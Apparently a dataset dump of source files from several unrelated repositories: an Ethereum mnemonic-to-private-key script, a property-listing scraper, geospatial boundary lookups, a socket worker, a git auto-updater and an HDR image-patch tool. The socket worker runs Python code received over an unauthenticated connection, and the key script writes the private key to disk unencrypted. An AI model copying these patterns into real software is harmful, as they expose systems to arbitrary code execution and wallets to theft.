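The script above is driven entirely by the `LEDGER` environment variable, which must equal one of the URLs in `connection_strings`; any other value raises `ValueError`. Below is a hedged, self-contained sketch of that gate; the dict is restated locally so the example runs on its own and does not touch any aea configuration.

```python
import os

ACCEPTED = {
    "ganache_local": "http://localhost:7545",
    "ganache_container": "http://ganachecli:7545",
}

os.environ["LEDGER"] = ACCEPTED["ganache_local"]   # e.g. pointing at a local Ganache node

ledger_string = os.environ.get("LEDGER")
if ledger_string not in ACCEPTED.values():
    raise ValueError(
        f"{ledger_string} is not a valid option. Must be one of {list(ACCEPTED.values())}"
    )
print(f"Would set the aea ledger address to {ledger_string}")
```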
{
"source": "8ball030/sushi-farmer",
"score": 3
} |
#### File: sushi-farmer/scripts/create_key.py
```python
import eth_account
def main():
a = eth_account.Account()
a.enable_unaudited_hdwallet_features()
    in_ = input("Please paste your 24-word backup phrase!\n")
local_account = a.from_mnemonic(in_)
with open("ethereum_private_key.txt", "w") as f:
f.write(str(local_account.privateKey.hex()))
print(f"Written key to file.")
if __name__ == "__main__":
main()
``` |
{
"source": "8ballbb/scrape_housing_sites",
"score": 2
} |
#### File: scrape_housing_sites/housing/listings.py
```python
from .utils import error_handler
from datetime import datetime
import json
from time import sleep
import re
from typing import Optional, Union
import requests
from tqdm import tqdm
PAYLOAD = {
"section": "residential-for-sale",
"filters": [
{
"name": "adState",
"values": ["published"]
},
{
"values": ["houses"],
"name": "propertyType"
}
],
"andFilters": [],
"ranges": [],
"paging": {
"from": "0",
"pageSize": "50"
},
"geoFilter": {
"storedShapeIds": ["1", "3", "2", "4"],
"geoSearchType": "STORED_SHAPES"
},
"terms": "",
"sort": "publishDateDesc"
}
def get_price(listing: dict) -> Union[int, str]:
    """Get property price; return "POA" when no numeric price is listed."""
    try:
        return int(re.sub(r"\D", "", listing["price"]))
    except ValueError:
        return "POA"
def get_bed(listing: dict) -> Optional[int]:
    """Get number of bedrooms; for ranges like "3 & 4 Bed" take the larger value."""
    try:
        return int(listing["numBedrooms"].lower().replace(" bed", ""))
    except ValueError:
        if "&" in listing["numBedrooms"]:
            return max(
                int(n) for n in listing["numBedrooms"].lower().replace(" bed", "").split(" & "))
        return None
def get_bath(listing: dict) -> int:
return int(listing["numBathrooms"].lower().replace(" bath", ""))
def get_ber(listing: dict) -> str:
return listing["ber"]["rating"]
def get_floor_area(listing: dict) -> float:
return float(listing["floorArea"]["value"])
def get_floor_area_unit(listing: dict) -> str:
return listing["floorArea"]["unit"]
def get_property_type(listing: dict) -> str:
return listing["propertyType"]
def get_estate_agent(listing: dict) -> str:
estate_agents = [
"<NAME>", "DNG", "<NAME>",
"Flynn & Associates Ltd", "Lisney", "Quillsen" ,"REA",
"Hunters Estate Agent", "<NAME>",
"<NAME>", "PropertyTeam", "RE/MAX", "<NAME>",
"Mason Estates", "Savills", "Property Partners"
]
for ea in estate_agents:
if ea in listing["seller"]["branch"]:
listing["seller"]["branch"] = ea
break
return listing["seller"]["branch"]
def get_lng(listing: dict) -> float:
return listing["point"]["coordinates"][0]
def get_lat(listing: dict) -> float:
return listing["point"]["coordinates"][1]
def get_listing_date(listing: dict) -> str:
"""Milliseconds since epoch"""
try:
return datetime.fromtimestamp(
listing["publishData"]/1000).strftime("%Y-%m-%d")
except KeyError:
return datetime.now().strftime('%Y-%m-%d')
def get_listing_data(listing):
listing_data = dict(
daft_id=listing["id"],
url=f"https://www.daft.ie{listing['seoFriendlyPath']}",
address=listing["title"],
price=error_handler(get_price, listing),
beds=error_handler(get_bed, listing),
baths=error_handler(get_bath, listing),
property_type=error_handler(get_property_type, listing),
estate_agent=error_handler(get_estate_agent, listing),
ber=error_handler(get_ber, listing),
floor_area=error_handler(get_floor_area, listing),
floor_area_unit=error_handler(get_floor_area_unit, listing),
lng=error_handler(get_lng, listing),
lat=error_handler(get_lat, listing),
publish_date=get_listing_date(listing)
)
return listing_data
def get_total_pages(headers) -> int:
"""Get number of pages to scrape"""
response = requests.request(
"POST", "https://gateway.daft.ie/old/v1/listings",
headers=headers,
data=json.dumps(PAYLOAD))
results = json.loads(response.content)
return results["paging"]["totalPages"]
def scrape_listing_pages(headers: dict) -> list:
"""Scrape data from each listing"""
total_pages = get_total_pages(headers) # get number of pages with listings
for _ in tqdm(range(total_pages)):
response = requests.request(
"POST", "https://gateway.daft.ie/old/v1/listings",
headers=headers,
data=json.dumps(PAYLOAD))
if response.status_code == 200:
listings = json.loads(response.content)["listings"]
for listing in listings:
yield get_listing_data(listing["listing"])
# Set page number
PAYLOAD["paging"]["from"] = (
int(PAYLOAD["paging"]["from"]) + int(PAYLOAD["paging"]["pageSize"]))
sleep(2)
```
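`scrape_listing_pages` is a generator that pages through the Daft listings endpoint and yields one flattened dict per listing. The following is a hedged usage sketch for consuming it into a DataFrame; the header values are placeholders, since the real request headers are constructed outside this file.

```python
import pandas as pd

from housing.listings import scrape_listing_pages

# Placeholder headers -- the real gateway headers (content type, API keys, etc.)
# are defined elsewhere in the project and are an assumption here.
headers = {"Content-Type": "application/json"}

df = pd.DataFrame(scrape_listing_pages(headers))
df.to_csv("daft_listings.csv", index=False)
```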
#### File: scrape_housing_sites/housing/osi.py
```python
from typing import Iterable, Optional, Tuple, Union
from functools import partial
import geopandas as gpd
def get_location_info(df):
df = gpd.GeoDataFrame(df, geometry=gpd.points_from_xy(df["lng"], df["lat"]))
df_small_area = get_small_area_data()
df_constituency = get_constituency_data()
df_electoral = get_electoral_data()
df_local_electoral = get_local_electoral_data()
osi_info = partial(
get_osi_info,
df_small_area=df_small_area,
df_constituency=df_constituency,
df_electoral=df_electoral,
df_local_electoral=df_local_electoral)
df["county_name"], df["small_area"], df["constituency"], df["province"], df["local_electoral"], df["county"] = zip(
*df["geometry"].apply(osi_info))
return df
def get_osi_info(
point,
df_small_area: gpd.geodataframe.GeoDataFrame,
df_constituency: gpd.geodataframe.GeoDataFrame,
df_electoral: gpd.geodataframe.GeoDataFrame,
df_local_electoral: gpd.geodataframe.GeoDataFrame):
county_area, area = get_small_area_info(df_small_area, point)
constituency = get_constituency_info(df_constituency, point)
_, province = get_electoral_info(df_electoral, point)
electoral_local, county = get_local_electoral_info(df_local_electoral, point)
return county_area, area, constituency, province, electoral_local, county
def get_small_area_info(
        df_small_area: gpd.geodataframe.GeoDataFrame, point) -> Tuple[Optional[str], Optional[str]]:
    """Return (county name, electoral division name) for the small area containing the point. TODO: refactor shared logic."""
small_area_filter = df_small_area["geometry"].contains(point)
small_areas = df_small_area.loc[small_area_filter]
if len(small_areas) > 1 or len(small_areas) == 0:
area, county_area = None, None
else:
area = small_areas["EDNAME"].iloc[0]
county_area = small_areas["COUNTYNAME"].iloc[0]
return county_area, area
def get_constituency_info(
df_constituency: gpd.geodataframe.GeoDataFrame, point) -> Union[str, None]:
"""TODO: Refactor required"""
constituency_filter = df_constituency["geometry"].contains(point)
constituencies = df_constituency.loc[constituency_filter]
if len(constituencies) > 1 or len(constituencies) == 0:
constituency = None
else:
constituency = constituencies["constituency"].iloc[0]
return constituency
def get_electoral_info(
df_electoral: gpd.geodataframe.GeoDataFrame, point) -> Union[str, None]:
"""TODO: Refactor required"""
electoral_filter = df_electoral["geometry"].contains(point)
electoral_divisions = df_electoral.loc[electoral_filter]
if len(electoral_divisions) > 1 or len(electoral_divisions) == 0:
electoral_div, province = None, None
else:
electoral_div = electoral_divisions["CSOED_34_1"].iloc[0]
province = electoral_divisions["PROVINCE"].iloc[0]
return electoral_div, province
def get_local_electoral_info(df_local_electoral: gpd.geodataframe.GeoDataFrame, point) -> Union[str, None]:
"""TODO: Refactor required"""
electoral_filter = df_local_electoral["geometry"].contains(point)
local_electorals = df_local_electoral.loc[electoral_filter]
if len(local_electorals) > 1 or len(local_electorals) == 0:
electoral_local, county = None, None
else:
electoral_local = local_electorals["local_electoral"].iloc[0]
county = local_electorals["COUNTY"].iloc[0]
return electoral_local, county
def get_small_area_data() -> gpd.geodataframe.GeoDataFrame:
"""TODO: write docstring"""
shp_data = "housing/osi_data/Small_Areas_Ungeneralised_-_OSi_National_Statistical_Boundaries_-_2015-shp/"
df_small_area = gpd.read_file(shp_data)
df_small_area = df_small_area.loc[:, ["COUNTYNAME", "EDNAME", "geometry"]]
df_small_area = df_small_area.to_crs(epsg=4326)
return df_small_area
def get_constituency_data() -> gpd.geodataframe.GeoDataFrame:
"""TODO: write docstring"""
shp_data = "housing/osi_data/Constituency_Boundaries_Ungeneralised_-_OSi_National_Electoral_Boundaries_-_2017/"
df_constituency = gpd.read_file(shp_data)
df_constituency = df_constituency.to_crs(epsg=4326)
df_constituency["constituency"] = df_constituency["CON_SEAT_"].str.replace(r"(.+) \(\d\)", r"\1", regex=True)
df_constituency = df_constituency.loc[:, ["constituency", "geometry"]]
return df_constituency
def get_electoral_data() -> gpd.geodataframe.GeoDataFrame:
"""TODO: write docstring"""
shp_data = "housing/osi_data/CSO_Electoral_Divisions_Ungeneralised_-_OSi_National_Statistical_Boundaries_-_2015-shp/"
df_electoral = gpd.read_file(shp_data)
df_electoral = df_electoral.to_crs(epsg=4326)
df_electoral = df_electoral.loc[:, ["CSOED_34_1", "PROVINCE", "geometry"]]
return df_electoral
def get_local_electoral_data() -> gpd.geodataframe.GeoDataFrame:
"""TODO: write docstring"""
shp_data = "housing/osi_data/Local_Electoral_Areas_-_OSi_National_Statutory_Boundaries-shp/"
df_local_electoral = gpd.read_file(shp_data)
df_local_electoral = df_local_electoral.to_crs(epsg=4326)
df_local_electoral = df_local_electoral.loc[:, ["COUNTY", "ENGLISH", "geometry"]]
df_local_electoral["local_electoral"] = (df_local_electoral["ENGLISH"]
.str.replace(r"( LEA-\d|-LEA-\d)", "", regex=True)
.str.title())
df_local_electoral["COUNTY"] = df_local_electoral["COUNTY"].str.title()
return df_local_electoral
``` |
{
"source": "8Banana/dotfiles",
"score": 2
} |
#### File: multicomputering/multicomputering/multicomputering_server.py
```python
import os
import pathlib
import shutil
import stat
import sys
import time
import types
from enum import Enum, auto
import importlib.util
import socket
import json
from multicomputering import Packer
class WorkerStates(Enum):
Listening = auto()
Connecting = auto()
PreparingWork = auto()
Working = auto()
class ComputerWorker:
_GUID_SEP = '0x27177c1797dc03ee853922f411bdf83f55e9ed2dcd953a4369f9b1a454e60fa0'.encode('utf-8')
def __init__(self, sock):
self.state = WorkerStates.Listening
self.sock = sock
self.workspace = {}
self._loc = None
self._packages_loc = None
self.results = {}
def ready_filesys(self, loc):
self._loc = os.path.dirname(os.path.abspath(__file__))
self._packages_loc = os.path.join(
self._loc, '..', '.multicomputering_packages_' + str(id(self)))
sys.path.append(loc or self._packages_loc)
pathlib.Path(self._packages_loc).mkdir(parents=True, exist_ok=True)
def clean_up_filesys(self):
shutil.rmtree(self._packages_loc, onerror=self.remove_readonly)
def start(self, loc=None):
self.ready_filesys(loc)
print('doing task :)')
self.recv_init()
self.recv_code()
self.recv_data()
self.wait_for_pulse()
self.run()
print('Done!')
self.clean_up_filesys()
self.disconnect()
def recv_init(self):
pass
def recv_code(self, *args):
data = self.recv()
data = json.loads(data.decode('utf-8'))
for module_name, contents in data.items():
Packer.write_package(self._packages_loc, module_name, contents)
self.workspace[module_name] = contents
self.pulse()
def recv_data(self, *args):
data = self.recv()
data = json.loads(data.decode('utf-8'))
Packer.write_data(
self._packages_loc, '_remote_data', data)
self.pulse()
def reflect(self):
pass
def clear_callables(self):
pass
def run(self):
py_obj = importlib.util.spec_from_file_location(
'main', os.path.join(
self._packages_loc, 'main' + '.py'))
module = importlib.util.module_from_spec(py_obj)
py_obj.loader.exec_module(module)
result = module.main()
self.send(result.encode('utf-8'))
def disconnect(self):
self.sock.close()
raise SystemExit(0)
def send(self, *args, **kwargs):
self.sock.sendall(*args, **kwargs)
def recv(self):
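        # The peer is expected to frame each message as a 64-byte big-endian length
        # header followed by the payload, e.g. len(payload).to_bytes(64, 'big') + payload.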
buffer = bytearray()
while True:
buffer += self.sock.recv(4096)
if len(buffer) >= 64:
bytes_target = int.from_bytes(buffer[:64], 'big')
buffer = buffer[64:]
break
while len(buffer) != bytes_target:
buffer += self.sock.recv(4096)
return buffer
def pulse(self):
self.send(b'wololoo')
def wait_for_pulse(self):
p = self.recv()
assert(p == b'wololoo')
@staticmethod
    def remove_readonly(func, path, _):
        """Clear the readonly bit and reattempt the removal."""
        print(path)
        os.chmod(path, stat.S_IWRITE)
        func(path)
def handler(sock, addr):
pc = ComputerWorker(sock)
try:
pc.start()
except KeyboardInterrupt as e:
pc.clean_up_filesys()
raise e
def main():
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.bind(('localhost', int(sys.argv[1])))
sock.listen(5)
while True:
(clientsock, address) = sock.accept()
print("Got client!", address)
handler(clientsock, address)
if __name__ == '__main__':
main()
``` |
{
"source": "8Banana/pythonbot",
"score": 2
} |
#### File: 8Banana/pythonbot/autoupdater.py
```python
import atexit
import inspect
import os
import subprocess
import sys
import threading
# This interval is 10 minutes because it's fun to see your updates come out
# when you want them to.
INTERVAL = int(1 * 60 * 10) # seconds
update_condition = threading.Condition()
filepath = None
def _get_output(args):
process = subprocess.run(args,
stdout=subprocess.PIPE)
assert process.returncode == 0
return process.stdout.decode("ascii").strip()
def _worker():
remote = "origin"
branch = _get_output(["git", "symbolic-ref", "--short", "HEAD"])
commit_hash = _get_output(["git", "rev-parse", "HEAD"])
while True:
command = subprocess.run(["git", "pull", remote, branch],
stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL)
if command.returncode == 0:
new_commit_hash = _get_output(["git", "rev-parse", "HEAD"])
if new_commit_hash != commit_hash:
restart()
with update_condition:
update_condition.wait(INTERVAL)
def restart():
if hasattr(atexit, "_run_exitfuncs"):
# We're about to leave in a way that's not expected by
# Python.
# This means that some things, including atexit callbacks,
# won't be run.
# We want them to run because ircbot.py relies on them, so
# this is our kind-of CPython hack.
atexit._run_exitfuncs()
os.execlp(sys.executable, sys.executable, filepath)
def initialize():
# TODO: Not use globals.
global filepath
# Initialize the auto-updater. Must be called in the main script.
parent_globals = inspect.currentframe().f_back.f_globals
assert parent_globals["__name__"] == "__main__"
filepath = parent_globals["__file__"]
threading.Thread(target=_worker).start()
``` |
{
"source": "8bignic8/MdataPicPrep",
"score": 3
} |
#### File: 8bignic8/MdataPicPrep/main_format.py
```python
import h5py as h5
import hdf5storage
import numpy as np
import imageio
import mat73
import os
import cv2
import random
import time
import argparse
#from IPython import display
#from IPython.display import Image, display
# In[ ]:
#Read Picture and return it
def readThePicture(picturepath):
# open ImageObject
try:
img = cv2.imread(picturepath, cv2.IMREAD_UNCHANGED)# | cv2.IMREAD_ANYCOLOR | cv2.IMREAD_ANYDEPTH)
#old
#imageio.plugins.freeimage.download()
        #img=imageio.imread(picturepath) # reads the image from picturepath
except:
print('There was an error while reading the picture')
img = 0
return(img) #returns picture
# In[ ]:
def tMO(file,name): #tonemapping the file
try:
if (name == 'reinhard'):
print('Reinhard')
intensity=-1.0
light_adapt=0.8
color_adapt=0.0
gamma=2.0
tmo = cv2.createTonemapReinhard(gamma=gamma, intensity=intensity, light_adapt=light_adapt, color_adapt=color_adapt)
#([, gamma[, intensity[, light_adapt[, color_adapt]]]]) https://www.kite.com/python/docs/cv2.createTonemapReinhard#
if (name == 'mantiuk'):
print('Mantiuk')
saturation=1.0
scale=0.75
gamma=2.0
tmo = cv2.createTonemapMantiuk(saturation=saturation, scale=scale, gamma=gamma)
if (name == 'drago'):
print('Drago')
saturation=1.0
bias=0.85
gamma=2.0
tmo = cv2.createTonemapDrago(saturation=saturation, bias=bias, gamma=gamma)
if (name == 'linear'):
print('Linear')
gamma=2.0
tmo = cv2.createTonemap(gamma=gamma)
except:
print('ToneMapping Error')
ldr = tmo.process(file)
return ldr
# In[ ]:
def Randtone_map(choose):
#a random tonemapping is returned
rand = random.SystemRandom()
if (choose >= 4):
        tmNumber = round((rand.randint(0, 30)/10)) # generates a random tonemapping number
else:
tmNumber = choose
try:
if (tmNumber<=0):
            return 'reinhard' #returns the name of the tonemapper
if (tmNumber==1):
return 'mantiuk'
if (tmNumber==2):
return 'drago'
if (tmNumber>=3):
return 'linear'
except:
        print('there was a TMO error')
#ToDo Output in CSV to later analize
# In[ ]:
def convert(img, target_type_min, target_type_max): # linearly rescales the input array into the given boundaries
imin = img.min()
imax = img.max()
#print(imin)
a = (target_type_max - target_type_min) / (imax - imin) # generates a factor a to multiply with the img
b = target_type_max - a * imax
new_img = (a * img + b)
return new_img
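# e.g. an array with values in [0.0, 2.0] passed through convert(img, 0, 255) is
# rescaled linearly so that 0.0 -> 0, 1.0 -> 127.5 and 2.0 -> 255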
# In[ ]:
def savePic(picture,fileName,extention,outPath): #saves the given array as a pictures to the given output path
#print('here:)')
outPath = outPath+fileName+'.'+extention
#print(outPath)
try:
#old
#imageio.imwrite(outPath,picture,format=extention)#extention'')#save the Data (path with name and file extention,PictureMatrix,format)
#new
print(picture.shape)
print('writePicture')
cv2.imwrite(outPath,picture)
print(outPath+'<=== Writing')
except:
print('Failed while saving picture: '+fileName+' to '+ outPath+' sorry :(')
print('--------------------')
# In[ ]:
def cutPatchxy(begX,endX,begY,endY,picyx):#cuts a patch out of a given array
try:
#print('CUTTTING')
#print(picyx.shape)
#print(begY-endY,begX-endX)
        picyx = picyx[endY:begY,endX:begX] #format y,start:end | x,start:end
#print(picyx.shape)
except:
print('FormatMaking Failed')
return picyx #returns a small part of the pic file
# In[ ]:
def totalpatchespossible(path,amountOfPictures,extention,px,py,tokonvPic): #calculates the amount of total possible patches of the path you picked
arraysize = 0 #zero the output
amountOfPictures = amountOfPictures - 1
tokonvPic= (amountOfPictures-(tokonvPic))+1 #generates the stop argument
while (amountOfPictures) >= tokonvPic:
try:
helping = os.listdir(path)[amountOfPictures].split('.')[1] #reading the File extention
if ( helping == extention): #only counts files with the same extention
he = (path+str(os.listdir(path)[amountOfPictures])) #reading path to picture
print(he) #prints the name of the picture what is currently been read
readPic = readThePicture(he)
arraysize = arraysize + (int(readPic.shape[1]/px)*int(readPic.shape[0]/py))# calculate the whole size an cut away the rest even when 0.9
except:
print('fail count all patches')
amountOfPictures = amountOfPictures - 1
print('There will be >> '+str(arraysize)+' << total patches')
return arraysize
# In[ ]:
def patchesyx(inputpic,py,px): #calculates how often the array can be devided by px in x and py in y
arraysize = []
try:
        y = int(inputpic.shape[0]/py) # calculates the number of patches along the y-axis
#print('y'+str(inputpic.shape[1]))
x = int(inputpic.shape[1]/px)
#print('x'+str(inputpic.shape[0]))
arraysize = (y,x)
except:
print('fail calc x and y')
return arraysize
# In[ ]:
def resizePic(inputpic,factor): #resizing the inputpic picture, keeping the information but scaling it down
y = int((inputpic.shape[0])/factor) #multiply the Factor in X[0],Y[1] config
x = int((inputpic.shape[1])/factor) #multiply the Factor
dim = (x, y)
#print(inputpic.shape)
#inputpic = np.reshape(inputpic,(inputpic.shape[1],inputpic.shape[0],inputpic.shape[2])) #rotate 180degree
pic = cv2.resize(inputpic,dim, interpolation = cv2.INTER_AREA)
#print('Reshaped'+str(pic.shape))
return pic
# In[ ]:
# In[ ]:
def RGBtoYUV(img): #changeing the img picture from RGB- to YUV-Color space
pictureYUV = cv2.cvtColor((img), cv2.COLOR_BGR2YUV, cv2.IMREAD_UNCHANGED)
#pictureRGB = cv2.cvtColor(img, cv2.COLOR_YUV2BGR)
#different Method
#im_rgb = img.astype(np.float32)
#im_ycrcb = cv2.cvtColor(im_rgb, cv2.COLOR_RGBE2YCR_CB)
#im_ycbcr = im_ycrcb[:,:,(0,2,1)].astype(np.float32)
#im_ycbcr[:,:,0] = (im_ycbcr[:,:,0]*(235-16)+16)/255.0 #to [16/255, 235/255]
#im_ycbcr[:,:,1:] = (im_ycbcr[:,:,1:]*(240-16)+16)/255.0 #to [16/255, 240/255]
return pictureYUV
# In[ ]:
def YUVtoRGB(img):#changeing the img picture from YUV- to RGB-Color space
#pictureRGB = cv2.cvtColor(img, cv2.COLOR_YUV2RGB, cv2.IMREAD_UNCHANGED)
#https://stackoverflow.com/questions/26480125/how-to-get-the-same-output-of-rgb2ycbcr-matlab-function-in-python-opencv
#https://docs.opencv.org/3.4/d8/d01/group__imgproc__color__conversions.html
pictureRGB = cv2.cvtColor((img), cv2.COLOR_YUV2BGR, cv2.IMREAD_UNCHANGED)
return pictureRGB
# In[ ]:
#TO Finish
def inputargs():#todo finish
parser = argparse.ArgumentParser()
parser.add_argument('--foo', help='foo help')
args = parser.parse_args()
# In[ ]:
# this function should return an random array with
def randArray(allPatches, patchPerPic):
patchRandArray = np.zeros((patchPerPic)) #generates the array
rand = random.SystemRandom() #starts the rand generator
while(patchPerPic > 0):
patchnNum = round(rand.randint(0, allPatches)) #
if (not(patchnNum in patchRandArray)): #if number is not in array already
patchRandArray[patchPerPic-1] = patchnNum #write it in
patchPerPic = patchPerPic -1
return patchRandArray
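# e.g. randArray(12, 3) returns an array of 3 distinct values drawn from 1..12
# (0 can never be picked because the array is pre-filled with zeros)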
# In[ ]:
def returnPosFromNumberXY(xMax,yMax, pos): #should return one coordinat in x and y cunts up from 0 to pos-1
#allpos = xMax*yMax
pos = pos-1
x = 0
y = 0
#print(x,y)
    y = pos // yMax # integer division gives the row
#print(x,y)
x = pos % yMax
#print(x,y)
return x,y
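# e.g. returnPosFromNumberXY(3, 2, 4): pos becomes 3, y = 3 // 2 = 1, x = 3 % 2 = 1,
# so the 4th patch maps to grid position (x, y) = (1, 1)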
# In[ ]:
#piccc = readThePicture('/home/nico/programm/MdataPicPrep/sdrOut/000000.png')
#piccc = RGBtoYUV(piccc)
#savePic(piccc,'fileName_asdsad2222as','png',"/home/nico/programm/MdataPicPrep/sdrOut/")
# In[ ]:
# In[ ]:
#---- input section
#TO DO add parser
path = ''
print('This script uses a folder and converts the pictures into smaller random patches in YUV or RGB color space. Use same-size files to avoid errors')
#data extention of the input data
extention = input('What file extension is supposed to be put into patches (e.g. hdr, png) [default: hdr]: ') or 'hdr'
print(extention)
#Where are the rawData at?
path = input('Where is the Path to the pictures (should be .hdr) [default: ./hdrInput/]') or './hdrInput/'
if not os.path.exists(path):
os.mkdir(path)
print(path)
amountOfPictures = 0
keepFileName = input('Do you want to keep the original filename? default: no ') or 'no'
amountOfPictures = sum(1 for f in os.listdir(path) if f.endswith('.'+extention)) #sum all files ending with the right extension
print('There are: '+str(amountOfPictures)+' '+extention+' Pictures in the folder')
#User can choose how many pictures should be cut in patches
tokonvPic = int(input('how many Pictures do you want to cut into patches? default 1: ') or '1')
print(str(tokonvPic)+' pictures will be cut into patches')
#scale factor for the low resolution is inputed
factor = int(input('Scale factor for Ldr LR [default:2]: ') or "2")
#asks for the px size of the high resolution pictures
fristPic = (readThePicture(path+str(os.listdir(path)[0])))
print('The first picture has the shape (y,x, color)'+str(fristPic.shape))
fristPic
xaxis = (int(int(fristPic.shape[1])/420))*420
yaxis = (int(int(fristPic.shape[0])/420))*420
print('Files will be scaled not cut. :)')
yaxis = int(input('Y Patch size from HDR HR Patch in py [default: '+str(yaxis)+' pixel]: ') or yaxis)
print(yaxis)
xaxis = int(input('X Patch size from HDR HR Patch in px [default: '+str(xaxis)+' pixel]: ') or xaxis)
print(xaxis)
toneMapper = int(input('Which tonemapper should be used: 0:reinhard, 1:mantiuk, 2:drago, 3:linear, 4>=: random: default:0') or "0")
#user can choose if the pacht-pictures should be in YU-V or RGB
youWantYUV = input('Do you want to convert to yuv default: no ') or 'no'
#user can coose in wich folder the .mat file is stored
savein = input('Should patches be saved as a .mat file (m), as pictures (p), or as both .mat and .hdr/.png (mp)? [default: p] ') or 'p'
print(savein)
unit_varSdr = (np.float32)
unit_varHdr = (np.float32)
testing = input('Is the dataset for testing purposes of the JSI-GAN? default: yes') or 'yes'
if (savein == 'p' or savein == 'mp'):
hrImgOut = input('Should the hdr pictures have the format .hdr (yes) or .png with 16bit (no)? default: no (png 16bit)') or 'no'
if (savein == 'm' or savein == 'mp'):
#user can choose the name for the .mat file
matName = input('Output Mat name default: data ') or 'data'
matPath = input('Output Mat directory path: ./matOut/ ') or './matOut/'
if not os.path.exists(matPath):
os.mkdir(matPath)
    jsi = input('Is it for the JSI-GAN conversion from float32 to uint8/16? default: yes ') or 'yes'
if (jsi != 'no'):
unit_varSdr = (np.uint8)
print('SDR .mat file will be uint8')
unit_varHdr = (np.uint16)
print('HDR .mat file will be uint16')
if (savein == 'p' or savein == 'mp' or savein == 'm'): #if user wants to output pates in picters he can choose where
    outPathsdr = input('specify the output path of sdr pictures [default: ./sdrOut/ ] ') or './sdrOut/' #set the picture save path if it is chosen
rgb_sdr = outPathsdr+'rgb/'
outPathsdr = outPathsdr+'YUV/'
if not os.path.exists(outPathsdr):
os.mkdir(outPathsdr)
if not os.path.exists(rgb_sdr):
os.mkdir(rgb_sdr)
    outPathhdr = input('specify the output path of hdr pictures [default: ./hdrOut/ ] ') or './hdrOut/' #set the picture save path if it is chosen
rgb_hdr = outPathhdr+'rgb/'
outPathhdr = outPathhdr+'YUV/'
if not os.path.exists(outPathhdr):
os.mkdir(outPathhdr)
if not os.path.exists(rgb_hdr):
os.mkdir(rgb_hdr)
if ((input('do you want to know all patches possible? default: no') or 'no')!='no'):
allpatches = totalpatchespossible(path,amountOfPictures,extention,xaxis,yaxis,tokonvPic) #calc all output patches
patchAmount = input('How many patches do you want to cut out of each Picture? default: 1 ') or '1'
# In[ ]:
start_time = time.time() #start the timeing of the Prgramm
### write pic to .mat and/or .hdr/.png
#Just for general information Data Structure JSI-Gan
###['SDR_data'],[79Y][79X][2C],[39839Num] dtype=uint8 Strukture .mat Data
###
###['HDR_data'][159][159][2][39839] dtype=uint16 Strukture .mat Data
#---- programm section
allpatches = int(patchAmount)*int(tokonvPic) # calculates the amount of pictures total
print('That will be ==> '+str(allpatches)+' Patches in total :)')
xldr = int(xaxis/factor) #calculates the samler array axes x
yldr = int(yaxis/factor)#calculates the samler array axes y
#print('XAch'+str(xaxis))
#print('YAch'+str(yaxis))
if (savein == 'm' or savein == 'mp'):
hdrarray = np.zeros((yaxis,xaxis,3,allpatches))#create empty np array of the size of allpatches
hdrarray = hdrarray.astype(unit_varHdr) #changes the type of np array to uint16
sdrarray = np.zeros((yldr,xldr,3,allpatches)) # creates the np array for the LR SDR array with new axes
sdrarray = sdrarray.astype(unit_varSdr)#changes the type of np array to uint8
#Arrays are defined in [amountOfallPatchesPossible,x,y,RGB]
print('Start processing...')
tokonvPic= (int(amountOfPictures)-int(tokonvPic))# the amount of pictures cut into patches is calculated
#print(tokonvPic)
#print(amountOfPictures)
while (amountOfPictures > tokonvPic):#tokonvPic): #filling Array with pachtes from high to low, beginning with the hightes Number
currentFile = os.listdir(path)[amountOfPictures-1] #currentFile holds the name of the current position file
try:
if (currentFile.split('.')[1] == str(extention)): #checks if file is ending as wanted
he = (path+str(currentFile))#gives the path and name with extention of the to process file
print('processing the picture: '+he) #prints it to the user
originalPicture = readThePicture(he) #reads the currentpicture and saves it y,x
##### Resizes the Picture to fit mutible of 420
xSize = (int(int(originalPicture.shape[1])/420))*420
#print('x'+str(xSize))
ySize = int(originalPicture.shape[0]/420)*420
#print('y'+str(ySize))
originalPicture = cv2.resize(originalPicture,(xSize,ySize), interpolation = cv2.INTER_AREA)
#print(originalPicture.shape)
#originalPicture = np.reshape(originalPicture,(int(originalPicture.shape[1]),int(originalPicture.shape[0]),int(originalPicture.shape[2]))) #rearanging in XYC
pyx=patchesyx(originalPicture,yaxis,xaxis) # gives back the length of the current picture (numx,numy) e.g. (3,2)
#print('YX'+str(pyx))
px= pyx[1] #saves the max x pos in px
py= pyx[0] #saves the max y pos in py
patchCuts = randArray((px*py),int(patchAmount))# returns a array with amount patchAmount and the random positions to cut
#print(patchCuts)
aktPatch = 0
savePXY = px,py
while (aktPatch < int(patchAmount)): # cut until you are at the beginning of the picture X position
randPosYX = returnPosFromNumberXY((savePXY[0]),(savePXY[1]),int(patchCuts[(aktPatch)])) #returns the x,y coordinate within a given position
#print('randPosYX')
#print(randPosYX)
aktPatch = aktPatch + 1
begy = randPosYX[0]* yaxis #is the new begin Pos in y
begx = randPosYX[1]* xaxis #is the new begin Pos in x
#print('Xaxis')
#print(xaxis)
px = begx + xaxis #is the new end Pos in x
py = begy + yaxis #is the new end Pos in Y
#print('Position:')
#print(px,py,begx,begy)
patch = cutPatchxy(px,begx,py,begy,originalPicture) #begX,endX,begY,endY,picyxmake the patch and return it to the patch (floart64) array
#print(patch.shape)
###choose your option
#HDR original with float32
hdr = patch
#HDR original in YUV
hdr_yuv = RGBtoYUV(hdr)
#HDR in uint16 with 10bit
hdr_png = np.clip((hdr*((2**10)-1)), 0, ((2**10)-1)).astype(np.uint16)
hdr_png_16bit = np.clip((hdr*((2**16)-1)), 0, ((2**16)-1)).astype(np.uint16)
#HDR in uint16 and yuv
hdr_png_yuv = np.clip((hdr_yuv*((2**10)-1)), 0, ((2**10)-1)).astype(np.uint16)
##SDR area
#choose tonemapping
tmo = Randtone_map(toneMapper)
#building the pictures
sdr_32 = tMO(hdr,tmo) # as float 32
sdr_32_8bit = np.clip((sdr_32*((2**8)-1)), 0, ((2**8)-1)).astype(np.uint8)
sdr_32_fac = resizePic(sdr_32,factor)
#SDR_lr
ldr_8 = np.clip((sdr_32_fac*((2**8)-1)), 0, ((2**8)-1)).astype(np.uint8)
#SDR_lr in YUV
ldr_8_yuv = (RGBtoYUV(((ldr_8).astype(np.uint8))).astype(np.uint8))
####Color YUV Section
if (savein == 'p' or savein == 'mp'): #save as picture if chosen
if(keepFileName == 'yes' ):
buildFilename = ((currentFile.split('.')[0])+'_'+str(allpatches-1))# dont delete builds output name
